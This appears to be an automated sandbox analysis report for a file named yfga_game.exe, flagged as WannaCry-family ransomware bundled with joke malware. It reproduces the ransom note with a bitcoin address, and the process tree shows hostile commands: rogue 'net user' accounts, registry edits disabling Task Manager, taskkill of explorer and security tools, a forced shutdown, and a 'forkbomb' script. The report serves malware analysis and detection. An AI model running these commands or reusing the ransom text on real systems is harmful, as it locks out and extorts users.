Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

yfga_game.exe

windows7-x64

10

yfga_game.exe

windows10-2004-x64

10

Resubmissions

15/07/2024, 12:26

240715-pmah5stdrh 10

15/07/2024, 12:01

240715-n64ewsyfjb 10

15/07/2024, 11:54

240715-n278aaxhmd 10

15/07/2024, 11:32

240715-nnry5sthpm 10

Analysis

  • max time kernel
    202s
  • max time network
    359s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    15/07/2024, 11:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    yfga_game.exe

  • Size

    46.7MB

  • MD5

    9d846a2d794eb4614b3d0feaa6f83259

  • SHA1

    ff6d194172fa313b8921a80cecc84f470d8dc2d0

  • SHA256

    cfd64f9ed065d19f7c488db3a8e29a553c9e61849b1d08765006110d73d3434b

  • SHA512

    6a8115aa70bd1d0d0af474a2d9d5f4ad03e2fa09277a1f3f3e6063682329b1b42aeef206f4a74d2fb76cd12afe4daf0bd1571c26c7121741a782241d3d28b521

  • SSDEEP

    786432:c7Ud58tChs1g2uzRx7KPB8NUc3sXEPeEwkHYvgctIKpJZXnfsrQl92Z3tHDUOsj1:4t96L76B0HkGUvgcaKpDPBl92HHDdsGy

Score
10/10
wannacryaspackv2defense_evasiondiscoveryevasionexecutionimpactpersistenceransomwarespywarestealerupxworm

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\@[email protected]

Family

wannacry

Ransom Note
Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94 Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �
Wallets

13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94

Signatures

  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
    evasion
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Wannacry

    WannaCry is a ransomware cryptoworm.

    ransomwarewormwannacry
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

    persistence
  • Disables Task Manager via registry modification
    evasion
  • ASPack v2.12-2.42 2 IoCs

    Detects executables packed with ASPack v2.12-2.42

    aspackv2
  • Drops startup file 2 IoCs
  • Executes dropped EXE 20 IoCs
  • Loads dropped DLL 49 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
    defense_evasion
  • Sets desktop wallpaper using registry 2 TTPs 4 IoCs
    ransomware
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • Delays execution with timeout.exe 4 IoCs
    evasion
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Kills process with taskkill 63 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 58 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Runs regedit.exe 1 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 41 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 46 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 2 IoCs
    evasion
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware
  • Views/modifies file attributes 1 TTPs 6 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\yfga_game.exe
    "C:\Users\Admin\AppData\Local\Temp\yfga_game.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2540
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\YFGA.bat" "
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2876
      • C:\Windows\SysWOW64\NOTEPAD.EXE
        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\IMPORTANT.txt
        3⤵
          PID:2720
        • C:\Windows\SysWOW64\net.exe
          net user "GO BACK!" "???" /add
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2604
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 user "GO BACK!" "???" /add
            4⤵
              PID:2628
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskManager" /t REG_DWORD /d 1
            3⤵
              PID:2016
            • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\screenscrew.exe
              screenscrew.exe
              3⤵
              • Executes dropped EXE
              PID:2336
            • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\flasher.exe
              flasher.exe
              3⤵
              • Executes dropped EXE
              PID:2920
            • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\calc.exe
              calc.exe
              3⤵
              • Executes dropped EXE
              PID:1244
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /K hydra.cmd
              3⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:668
              • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\jokewarehydra.exe
                jokewarehydra.exe
                4⤵
                • Executes dropped EXE
                • Suspicious use of FindShellTrayWindow
                PID:1732
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy3.vbs"
                4⤵
                  PID:872
              • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\walliant.exe
                walliant.exe
                3⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:1684
                • C:\Users\Admin\AppData\Local\Temp\is-LI7AF.tmp\walliant.tmp
                  "C:\Users\Admin\AppData\Local\Temp\is-LI7AF.tmp\walliant.tmp" /SL5="$40166,4511977,830464,C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\walliant.exe"
                  4⤵
                  • Executes dropped EXE
                  PID:2340
              • C:\Windows\SysWOW64\net.exe
                net user "FUCK OFF YFGA" "I DONT KNOW" /add
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1044
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 user "FUCK OFF YFGA" "I DONT KNOW" /add
                  4⤵
                    PID:2968
                • C:\Windows\SysWOW64\reg.exe
                  reg import reg.reg
                  3⤵
                  • Sets desktop wallpaper using registry
                  PID:1900
                • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\YouAreAnIdiot.exe
                  youareanidiot.exe
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:2944
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2944 -s 876
                    4⤵
                    • Loads dropped DLL
                    • Program crash
                    PID:780
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im fontdrvhost.exe
                  3⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:340
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im TextInputhost.exe
                  3⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1552
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im explorer.exe
                  3⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2012
                • C:\Windows\SysWOW64\timeout.exe
                  timeout 5
                  3⤵
                  • Delays execution with timeout.exe
                  PID:1200
                • C:\Windows\SysWOW64\shutdown.exe
                  shutdown /r /t 30000 /c "HAHA I HACKED YOU AYFGA ROCKS YOU"
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1936
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /K spam.bat "forkbomb" /min
                  3⤵
                    PID:296
                    • C:\Windows\SysWOW64\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy.vbs"
                      4⤵
                        PID:1540
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /f /im taskmgr.exe
                        4⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1164
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /f /im regedit.exe
                        4⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2324
                      • C:\Windows\SysWOW64\WScript.exe
                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy2.vbs"
                        4⤵
                          PID:1500
                        • C:\Windows\SysWOW64\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy.vbs"
                          4⤵
                            PID:1980
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /f /im taskmgr.exe
                            4⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1604
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /f /im regedit.exe
                            4⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2052
                          • C:\Windows\SysWOW64\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy2.vbs"
                            4⤵
                              PID:2272
                            • C:\Windows\SysWOW64\WScript.exe
                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy.vbs"
                              4⤵
                                PID:2972
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /f /im taskmgr.exe
                                4⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2744
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /f /im regedit.exe
                                4⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2672
                              • C:\Windows\SysWOW64\WScript.exe
                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy2.vbs"
                                4⤵
                                  PID:1204
                                • C:\Windows\SysWOW64\WScript.exe
                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy.vbs"
                                  4⤵
                                    PID:2596
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /f /im taskmgr.exe
                                    4⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2840
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /f /im regedit.exe
                                    4⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1544
                                  • C:\Windows\SysWOW64\WScript.exe
                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy2.vbs"
                                    4⤵
                                      PID:3008
                                    • C:\Windows\SysWOW64\WScript.exe
                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy.vbs"
                                      4⤵
                                        PID:396
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /f /im taskmgr.exe
                                        4⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1800
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /f /im regedit.exe
                                        4⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1548
                                      • C:\Windows\SysWOW64\WScript.exe
                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy2.vbs"
                                        4⤵
                                          PID:2924
                                        • C:\Windows\SysWOW64\WScript.exe
                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy.vbs"
                                          4⤵
                                            PID:872
                                          • C:\Windows\SysWOW64\taskkill.exe
                                            taskkill /f /im taskmgr.exe
                                            4⤵
                                            • Kills process with taskkill
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1820
                                          • C:\Windows\SysWOW64\taskkill.exe
                                            taskkill /f /im regedit.exe
                                            4⤵
                                            • Kills process with taskkill
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2264
                                          • C:\Windows\SysWOW64\WScript.exe
                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy2.vbs"
                                            4⤵
                                              PID:1884
                                            • C:\Windows\SysWOW64\WScript.exe
                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy.vbs"
                                              4⤵
                                                PID:2412
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /f /im taskmgr.exe
                                                4⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1756
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /f /im regedit.exe
                                                4⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2536
                                              • C:\Windows\SysWOW64\WScript.exe
                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy2.vbs"
                                                4⤵
                                                  PID:1588
                                                • C:\Windows\SysWOW64\WScript.exe
                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy.vbs"
                                                  4⤵
                                                    PID:2504
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /f /im taskmgr.exe
                                                    4⤵
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1472
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /f /im regedit.exe
                                                    4⤵
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2572
                                                  • C:\Windows\SysWOW64\WScript.exe
                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy2.vbs"
                                                    4⤵
                                                      PID:2624
                                                    • C:\Windows\SysWOW64\WScript.exe
                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy.vbs"
                                                      4⤵
                                                        PID:1100
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /f /im taskmgr.exe
                                                        4⤵
                                                        • Kills process with taskkill
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1168
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /f /im regedit.exe
                                                        4⤵
                                                        • Kills process with taskkill
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2968
                                                      • C:\Windows\SysWOW64\WScript.exe
                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy2.vbs"
                                                        4⤵
                                                          PID:668
                                                        • C:\Windows\SysWOW64\WScript.exe
                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy.vbs"
                                                          4⤵
                                                            PID:864
                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                            taskkill /f /im taskmgr.exe
                                                            4⤵
                                                            • Kills process with taskkill
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1720
                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                            taskkill /f /im regedit.exe
                                                            4⤵
                                                            • Kills process with taskkill
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1800
                                                          • C:\Windows\SysWOW64\WScript.exe
                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy2.vbs"
                                                            4⤵
                                                              PID:1664
                                                            • C:\Windows\SysWOW64\WScript.exe
                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy.vbs"
                                                              4⤵
                                                                PID:3048
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im taskmgr.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2792
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im regedit.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1200
                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy2.vbs"
                                                                4⤵
                                                                  PID:2552
                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy.vbs"
                                                                  4⤵
                                                                    PID:2416
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /f /im taskmgr.exe
                                                                    4⤵
                                                                    • Kills process with taskkill
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:1952
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /f /im regedit.exe
                                                                    4⤵
                                                                    • Kills process with taskkill
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2500
                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy2.vbs"
                                                                    4⤵
                                                                      PID:1472
                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy.vbs"
                                                                      4⤵
                                                                        PID:2780
                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                        taskkill /f /im taskmgr.exe
                                                                        4⤵
                                                                        • Kills process with taskkill
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:1076
                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                        taskkill /f /im regedit.exe
                                                                        4⤵
                                                                        • Kills process with taskkill
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:2368
                                                                      • C:\Windows\SysWOW64\WScript.exe
                                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy2.vbs"
                                                                        4⤵
                                                                          PID:2976
                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy.vbs"
                                                                          4⤵
                                                                            PID:2532
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im taskmgr.exe
                                                                            4⤵
                                                                            • Kills process with taskkill
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:2008
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im regedit.exe
                                                                            4⤵
                                                                            • Kills process with taskkill
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1800
                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy2.vbs"
                                                                            4⤵
                                                                              PID:1820
                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy.vbs"
                                                                              4⤵
                                                                                PID:2160
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill /f /im taskmgr.exe
                                                                                4⤵
                                                                                • Kills process with taskkill
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:928
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill /f /im regedit.exe
                                                                                4⤵
                                                                                • Kills process with taskkill
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:976
                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy2.vbs"
                                                                                4⤵
                                                                                  PID:888
                                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy.vbs"
                                                                                  4⤵
                                                                                    PID:2884
                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                    taskkill /f /im taskmgr.exe
                                                                                    4⤵
                                                                                    • Kills process with taskkill
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:2040
                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                    taskkill /f /im regedit.exe
                                                                                    4⤵
                                                                                    • Kills process with taskkill
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:1396
                                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy2.vbs"
                                                                                    4⤵
                                                                                      PID:2696
                                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy.vbs"
                                                                                      4⤵
                                                                                        PID:3020
                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                        taskkill /f /im taskmgr.exe
                                                                                        4⤵
                                                                                        • Kills process with taskkill
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:1896
                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                        taskkill /f /im regedit.exe
                                                                                        4⤵
                                                                                        • Kills process with taskkill
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:1792
                                                                                      • C:\Windows\SysWOW64\WScript.exe
                                                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy2.vbs"
                                                                                        4⤵
                                                                                          PID:960
                                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy.vbs"
                                                                                          4⤵
                                                                                            PID:2536
                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                            taskkill /f /im taskmgr.exe
                                                                                            4⤵
                                                                                            • Kills process with taskkill
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:1956
                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                            taskkill /f /im regedit.exe
                                                                                            4⤵
                                                                                            • Kills process with taskkill
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:576
                                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy2.vbs"
                                                                                            4⤵
                                                                                              PID:3052
                                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy.vbs"
                                                                                              4⤵
                                                                                                PID:868
                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                taskkill /f /im taskmgr.exe
                                                                                                4⤵
                                                                                                • Kills process with taskkill
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:1088
                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                taskkill /f /im regedit.exe
                                                                                                4⤵
                                                                                                • Kills process with taskkill
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2904
                                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy2.vbs"
                                                                                                4⤵
                                                                                                  PID:1760
                                                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy.vbs"
                                                                                                  4⤵
                                                                                                    PID:1964
                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                    taskkill /f /im taskmgr.exe
                                                                                                    4⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:1944
                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                    taskkill /f /im regedit.exe
                                                                                                    4⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:1436
                                                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy2.vbs"
                                                                                                    4⤵
                                                                                                      PID:2672
                                                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy.vbs"
                                                                                                      4⤵
                                                                                                        PID:1628
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /f /im taskmgr.exe
                                                                                                        4⤵
                                                                                                        • Kills process with taskkill
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:3012
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /f /im regedit.exe
                                                                                                        4⤵
                                                                                                        • Kills process with taskkill
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:1896
                                                                                                      • C:\Windows\SysWOW64\WScript.exe
                                                                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy2.vbs"
                                                                                                        4⤵
                                                                                                          PID:644
                                                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy.vbs"
                                                                                                          4⤵
